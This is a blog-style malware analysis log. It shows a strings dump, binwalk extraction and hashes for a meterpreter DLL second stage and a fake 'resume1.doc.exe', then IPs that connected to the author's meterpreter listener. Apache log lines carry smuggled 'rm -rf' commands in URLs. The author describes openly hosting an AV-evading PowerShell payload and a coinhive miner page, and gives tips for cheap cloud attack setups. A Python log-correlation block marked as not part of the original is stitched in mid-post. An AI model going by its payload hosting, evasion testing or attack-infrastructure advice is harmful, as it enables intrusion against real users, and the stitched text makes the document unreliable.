egrep -nor '[^ ]{30,}' resumepcap.stringsdump |grep string
1237:string=core_negotiate_tlv_encryption
1238:string=core_transport_set_timeouts
1239:string=core_transport_getcerthash
1240:string=core_transport_setcerthash
1261:string=\a\a\b\b\t\t\n\n\v\v\f\f\r\r
1382:string=InitializeCriticalSectionEx
1385:string=SetThreadStackGuarantee
1388:string=WaitForThreadpoolTimerCallbacks
1393:string=FlushProcessWriteBuffers
1394:string=FreeLibraryWhenCallbackReturns
1395:string=GetCurrentProcessorNumber
1396:string=GetLogicalProcessorInformation
1398:string=SetDefaultDllDirectories
1404:string=GetUserDefaultLocaleName
1409:string=GetFileInformationByHandleExW
1410:string=SetFileInformationByHandleW
1436:string=GetUserObjectInformationW
1437:string=GetProcessWindowStation
1770:string=QQ𥸸𥽼𦃀ᙏὫ峹巋O3ï澢漣瀻瀎潌滺殭歩樭栺损槎摲撋搹敷掊搔措揉敆檇憺抪戡拔曇晬暧晜暄栎枵枍曧杘朏晋昪欗棭榨梽硒砩礓禔穑𦅭𦅲𦠑𦆆𦆗𦆦𦆴𦇃𦇛𦇯𦈅𦈠𦈰𦈿𦉒𦉲𦊄𦊖𦊥𦋃𦋔𦋥𦋵𦌌𦌙𦌦𦍁𦍡𦍳𦎋𦎩𦎺𦏈𦏢𦏺𦐍𦐤𦐳𦑈𦑙𦑮𦒂𦒛𦒹𦓎𦓟𦓵𦔉𦔞𦔳𦕆𦕜𦕰𦖇𦖢𦖲𦗒𦗠𦗴𦘋𦘚𦘪𦘹𦙔𦙨𦙾𦚘𦚳𦛌𦛨𦜂𦜟𦜯𦝍𦝮𦝾𦞝𦞶𦟈𦟝𦟷𠁐
1773:string=packet_get_tlv_value_string
1774:string=packet_get_tlv_value_uint
1775:string=packet_get_tlv_value_wstring
1777:string=packet_is_tlv_null_terminated
1778:string=packet_remove_completion_handler
1780:string=packet_transmit_empty_response
1781:string=packet_transmit_response
1784:string=scheduler_insert_waitable
1785:string=scheduler_signal_waitable
1786:string=_scheduler_waitable_thread@4
1789:string=CertGetCertificateContextProperty
1813:string=WinHttpGetIEProxyConfigForCurrentUser
1826:string=SetUnhandledExceptionFilter
1856:string=GetProcessWindowStation
1857:string=GetUserObjectInformationW
1862:string=AllocateAndInitializeSid
1864:string=InitializeSecurityDescriptor
1865:string=SetSecurityDescriptorDacl
1866:string=SetSecurityDescriptorSacl
1873:string=CryptImportPublicKeyInfo
1895:string=CreateToolhelp32Snapshot
1903:string=GetSystemTimeAsFileTime
1908:string=IsProcessorFeaturePresent
1922:string=QueryPerformanceCounter
1924:string=FreeEnvironmentStringsW
1925:string=UnhandledExceptionFilter
1926:string=InitializeCriticalSectionAndSpinCount
1946:string=ImpersonateLoggedOnUser
2008:string=core_pivot_session_died
2028:string=\a\a\b\b\t\t\n\n\v\v\f\f\r\r
2056:string=\t\a\f\b\f\t\f\n\a\v\b\f
2061:string=abcdefghijklmnopqrstuvwxyz
2062:string=ABCDEFGHIJKLMNOPQRSTUVWXYZ
2064:string=abcdefghijklmnopqrstuvwxyz
2065:string=ABCDEFGHIJKLMNOPQRSTUVWXYZ
2147:string=6#6'6+6/63676;6/8N8m8r8
2183:string=3\a43494=4B4H4L4R4V4\4`4e4k4o4u4y4
2186:string=:\b:$:0:6:A:O:X:b:r:w:|:
2212:string=2$2*22272=2E2J2P2X2]2c2k2p2v2~2
2248:string=6<:@:D:H:L:P:T:X:\:`:d:h:
2255:string=:$:,:4:<:D:L:T:\:d:l:t:|:
2256:string=;$;,;4;<;D;L;T;\;d;l;t;|;
2257:string=<$<,<4<<<D<L<T<\<d<l<t<|<
2258:string==$=,=4=<=D=L=T=\=d=l=t=|=
2259:string=>$>,>4><>D>L>T>\>d>l>t>|>
2260:string=?$?,?4?<?D?L?T?\?d?l?t?|?
2261:string=0$0,040<0D0L0T0\0d0l0t0|0

; Got new binary / 2nd stage
binwalk -e resumepcap.hexdump
file _resumepcap.hexdump.extracted/4
_resumepcap.hexdump.extracted/4: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
md5sum _resumepcap.hexdump.extracted/4
eeb70c0bd145011062f0116738e10a5e _resumepcap.hexdump.extracted/4
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d md5: eeb70c0bd145011062f0116738e10a5e
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d sha1: 295be71de968e22a14c2a0fb558d3295b4c2a7c3
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d sha256: 5baecac3ee5cf8f8f0d13d19c540310681abbc1e6978e397d077885d6c104b6f
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d sha384: 950bee417b6b6fa9bbdb4becbcba3b574a4d8d4201d6a089bd8bf4a566291d976f803331999cd46ed2c53c49bdeda973
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d sha512: aa15fb09b5e8a5b9904ef3582f28a521afc32a1f3771dec65e5699b08bcad2fbccfb43c1124987cc1d78ba8814a98c75f28ff73a82f7c125c5515f389c7d9cff
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc16: 4df2
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc32: c854733c
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d md4: db31d79e9eaddfc0a93e043d058c9ca0
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d xor: ae
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d xorpair: 54fa
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d parity: 01
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d entropy: 07000000
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d hamdist: 06
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d pcprint: 22
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d mod255: f6
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d xxhash: ae3757fa
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d adler32: 52af2f02
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d luhn: 03
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc8smbus: ef
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc15can: 759f
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc16hdlc: 270e
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc16usb: 2328
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc16citt: 8672
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc24: bd3f25
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc32c: 2fa98f85
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc32ecma267: c7e20603

; lazy again:
cp _resumepcap.hexdump.extracted/4 ./4.exe
https://www.virustotal.com/#/file/5baecac3ee5cf8f8f0d13d19c540310681abbc1e6978e397d077885d6c104b6f/detection
https://www.hybrid-analysis.com/sample/5baecac3ee5cf8f8f0d13d19c540310681abbc1e6978e397d077885d6c104b6f?environmentId=120

; Total IOCs
(myserver):9008
9A8FE886ABA12E02FD0FC44F004A7111
rahash2 -a all _resumepcap.hexdump.extracted/4 |awk '{print $3,$4}'
md5: eeb70c0bd145011062f0116738e10a5e
sha1: 295be71de968e22a14c2a0fb558d3295b4c2a7c3
sha256: 5baecac3ee5cf8f8f0d13d19c540310681abbc1e6978e397d077885d6c104b6f
sha384: 950bee417b6b6fa9bbdb4becbcba3b574a4d8d4201d6a089bd8bf4a566291d976f803331999cd46ed2c53c49bdeda973
sha512: aa15fb09b5e8a5b9904ef3582f28a521afc32a1f3771dec65e5699b08bcad2fbccfb43c1124987cc1d78ba8814a98c75f28ff73a82f7c125c5515f389c7d9cff
crc16: 4df2
crc32: c854733c
md4: db31d79e9eaddfc0a93e043d058c9ca0
xor: ae
xorpair: 54fa
parity: 01
entropy: 07000000
hamdist: 06
pcprint: 22
mod255: f6
xxhash: ae3757fa
adler32: 52af2f02
luhn: 03
crc8smbus: ef
crc15can: 759f
crc16hdlc: 270e
crc16usb: 2328
crc16citt: 8672
crc24: bd3f25
crc32c: 2fa98f85
crc32ecma267: c7e20603
rahash2 -a all resume1.doc.exe |awk '{print $3,$4}'
md5: 90f7ee1bf4451349dfa7c518a8c6202a
sha1: 0c214854fef6ac5c28f84bf07ee6d39eb3595d82
sha256: ea2bb0a47fedb86127a59e71285f61036e1ff9c4e0a1d0fae6fe8f2931e4d5a6
sha384: abfd2915e8b1bce3c871a8faec67b503599908c24ba08dfdcc8ca52c04560ec132328a31f53d4c8853ce12256488d0ad
sha512: fac47672393b774135997b98c86874667a526bc40c8ab04745d4c28de3b1afdea9f8efc257a9e8e4f42d3341f065a81bde0fe93a220a3adae338a1776bb5a691
crc16: 9f78
crc32: 1b63e4bd
md4: 282dcd274bd2efade3765ddff3ec65e1
xor: eb
xorpair: 3ad1
parity: 00
entropy: 03000000
hamdist: 01
pcprint: 2d
mod255: 4d
xxhash: 5924b386
adler32: 913ba49c
luhn: 00
crc8smbus: 3f
crc15can: 5a1d
crc16hdlc: 4045
crc16usb: a732
crc16citt: 4b6a
crc24: 7a1917
crc32c: d18b15a4
crc32ecma267: df97a7b0
rahash2 -a all resumebase64.decoded |awk '{print $3,$4}'
md5: 3205f33d70ec93109d60da5fe1002e7e
sha1: ec19a5fa86353b176941809b1e9858aead9047a3
sha256: e02b170466ee0f810656bfeca8c9c7ce523b635fa36248dd7f9259629a593be5
sha384: f232b1f8dd2d2c4d07dc761eb6ef1b7defbc6379f15222d607e43e22a2f0c48ea98986db9e32164e3c88287d34224d73
sha512: 547fb256993e4febce7f3da35ce5cfbf485e8ee97f9fe1861b82172b4c7f94082fa5b66738d289a0db2fb3be97acb900290786bf987f813ef00eb8aee97f1f51
crc16: 78af
crc32: d40234f5
md4: 1a8108290cfc7ffa605b0879d6e3b8f2
xor: 0a
xorpair: 0a00
parity: 00
entropy: 03000000
hamdist: 02
pcprint: 32
mod255: 98
xxhash: c09b7c9b
adler32: be051623
luhn: 09
crc8smbus: 84
crc15can: 4d93
crc16hdlc: e7fa
crc16usb: 8313
crc16citt: f7ba
crc24: e9c836
crc32c: 75c98a63
crc32ecma267: 04a00a8f
The gist of all that is that it connected back to port 9008 on my server, where I have an active meterpreter listener forwarded to. Pretty easy, not really a difficult analysis, really a 5 minute rush job. But it does help me confirm that meterpreter launches that secondary payload when run; that's pretty sweet, though everyone sort of knew that. Since launching this and a few other things online, I've received a number of hits on my shell from people looking at that port:
As of the time of this writing:
185.220.101.6
163.172.214.8
37.59.20.111
107.178.194.23
52.200.221.20
14.141.107.206
66.249.88.132
208.87.233.140
185.220.101.13
161.69.99.11
5.62.59.93
1.192.194.17
134.96.238.193
50.112.194.65
curl "https://torstatus.blutmagie.de/ip_list_exit.php/Tor_ip_list_EXIT.csv" 2>/dev/null|grep "185.220.101.6\|163.172.214.8\|37.59.20.111\|107.178.194.23\|52.200.221.20\|50.112.194.65\|14.141.107.206\|66.249.88.132\|208.87.233.140\|185.220.101.13\|161.69.99.11\|5.62.59.93\|1.192.194.17\|134.96.238.193\|50.112.194.65"
163.172.214.8
185.220.101.6
185.220.101.13
This last one is sort of amusing because it tells me they looked a little bit into my site:
/var/log/apache2/access.log:50.112.194.65 - - [16/Apr/2018:07:31:29 -0500] "GET /diagfix.cmd HTTP/1.1" 200 7184 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:29:43 -0600] "GET /miner.html?lol&rm -rf" 400 0 "-" "-"
/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:35:32 -0600] "GET / HTTP/1.1" 200 198376 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Edit: I wanted to add more, because the comparison amuses me between the IPs connecting to my C2 port for my test malware and the hosts connecting to my web server, not including Tor nodes:
grep -i "37.59.20.111\|107.178.194.23\|52.200.221.20\|14.141.107.206\|66.249.88.132\|208.87.233.140\|161.69.99.11\|5.62.59.93\|1.192.194.171\|34.96.238.193\|50.112.194.65" /var/log/apache2/access.log*
/var/log/apache2/access.log:50.112.194.65 - - [16/Apr/2018:07:31:29 -0500] "GET /diagfix.cmd HTTP/1.1" 200 7184 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
/var/log/apache2/access.log.8:107.178.194.23 - - [05/Mar/2018:10:26:56 -0600] "GET /miner.html?lol&rm%20-rf%20/boot/&rm%20-rf%20/opt/&rm%20-rf%20~/& HTTP/1.1" 200 654 "http://0daz.io" "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) AppEngine-Google; (+http://code.google.com/appengine; appid: s~virustotalcloud)"
/var/log/apache2/access.log.8:208.87.233.140 - - [05/Mar/2018:10:26:56 -0600] "GET /miner.html HTTP/1.1" 200 654 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13"
/var/log/apache2/access.log.8:208.87.233.140 - - [05/Mar/2018:10:26:57 -0600] "GET /coinhive.min.js HTTP/1.1" 200 18805 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13"
/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:29:43 -0600] "GET /miner.html?lol&rm -rf" 400 0 "-" "-"
/var/log/apache2/access.log.8:208.87.233.140 - - [05/Mar/2018:10:32:39 -0600] "GET / HTTP/1.1" 200 8440260 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1"
/var/log/apache2/access.log.8:52.200.221.20 - - [05/Mar/2018:10:35:21 -0600] "GET / HTTP/1.1" 200 157832 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:35:32 -0600] "GET / HTTP/1.1" 200 198376 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
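The Tor-versus-web-server correlation done above, as an added example that is not part of the original post: it matches whole addresses instead of grepping substrings (so 192.0.2.4 can never match 192.0.2.44), parses the Apache combined format, and flags the VirusTotal scanner user-agent visible in the log above. The hit list, Tor exit list and log lines are constructed samples on RFC 5737 addresses, and looks_like_sandbox is a hypothetical helper, not anything from the post's tooling.

```python
import re
from collections import defaultdict

# Constructed sample inputs (not the post's real data): hits on the listener
# port, a Tor exit list in one-IP-per-line CSV form, and Apache combined lines.
C2_HITS = ["198.51.100.7", "203.0.113.5", "192.0.2.44", "192.0.2.4"]
TOR_EXIT_CSV = "203.0.113.5\n198.51.100.99\n"
ACCESS_LOG = """\
192.0.2.44 - - [16/Apr/2018:07:31:29 -0500] "GET /diagfix.cmd HTTP/1.1" 200 7184 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
192.0.2.4 - - [05/Mar/2018:10:26:56 -0600] "GET /miner.html HTTP/1.1" 200 654 "-" "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) AppEngine-Google; (+http://code.google.com/appengine; appid: s~virustotalcloud)"
192.0.2.44 - - [05/Mar/2018:10:29:43 -0600] "GET /miner.html?lol&rm -rf" 400 0 "-" "-"
"""

# Apache combined log format; the request field may lack an HTTP version.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

def split_tor(hits, tor_csv):
    """Partition C2 hits into Tor exit nodes and everything else,
    comparing whole addresses rather than substrings as grep would."""
    exits = {line.strip() for line in tor_csv.splitlines() if line.strip()}
    tor = [ip for ip in hits if ip in exits]
    non_tor = [ip for ip in hits if ip not in exits]
    return tor, non_tor

def parse_access_log(text):
    """Parse combined-format lines; lines that do not match are skipped."""
    rows = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            rows.append(m.groupdict())
    return rows

def correlate(non_tor, rows):
    """Map each non-Tor C2 source to the web requests it also made."""
    wanted = set(non_tor)
    by_ip = defaultdict(list)
    for r in rows:
        if r["ip"] in wanted:
            by_ip[r["ip"]].append((r["ts"], r["req"], r["status"], r["ua"]))
    return dict(by_ip)

def looks_like_sandbox(ua):
    # Hypothetical, crude fingerprint: the post's log shows VirusTotal's URL
    # scanner identifying itself through an AppEngine app id in the UA.
    return "virustotalcloud" in ua or "AppEngine-Google" in ua
```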
But what are people trying to analyze? Well, the miner one, with that particular notion at the end, was one provided in another post on this blog plus my own GET data appended to it. This was specific to a URL submission to VirusTotal, because I want to track who's tracking this. The diagfix one is unrelated, but is a repeatedly regenerated (every 300 seconds) unicorn PowerShell payload. I did this for ease of use and for testing the "fud" capabilities of TheFatRat. Honestly, it does a decent job of evading some shit, but anyone who looks at it for a split second would recognize it. YARA rules could easily detect it, or the exec form. You'll see in my above example I left out the meterpreter YARA rules; this is because, well, I wanted to do the analysis without the answer handed to me.
Things I learned with this week of dickery:
- People seem to be rummaging through and analyzing things they happen across, or that were involved in something flagged by the APT detection BS.
- Apparently people detect meterpreter data as part of Poison Ivy.
- Looked further: neat, the copy of Poison Ivy I have does partially contain code from the stdapi nonsense meterpreter sends down.
- TheFatRat as a wrapper is pretty nice, but you can skip it and use the power.py and pw_exec.py tools on your own, such as in a cron/at/while loop.
- Automated tools used when analyzing things often show weaker precautions than the people meant to provide the reports.
- A $5 cloud or Docker instance, for a few hours of playing, with just a minimal amount of preparation beforehand, gives you a full-purpose suite for rapid spin-up, attack, and spin-down.
- Better yet, cloud services with per-hour pricing, awww yeah... just don't assume they actually destroy things when it seems they did; go ahead and zero-fill everything you don't want shared before you deprovision.
-Ferasdour
https://keybase.io/ferasdour
https://www.facebook.com/help.ferasdour